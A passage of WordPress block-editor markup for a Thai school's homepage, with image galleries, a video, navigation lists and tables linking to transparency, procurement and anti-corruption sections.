{\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-48e80028 gb-button-text\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift 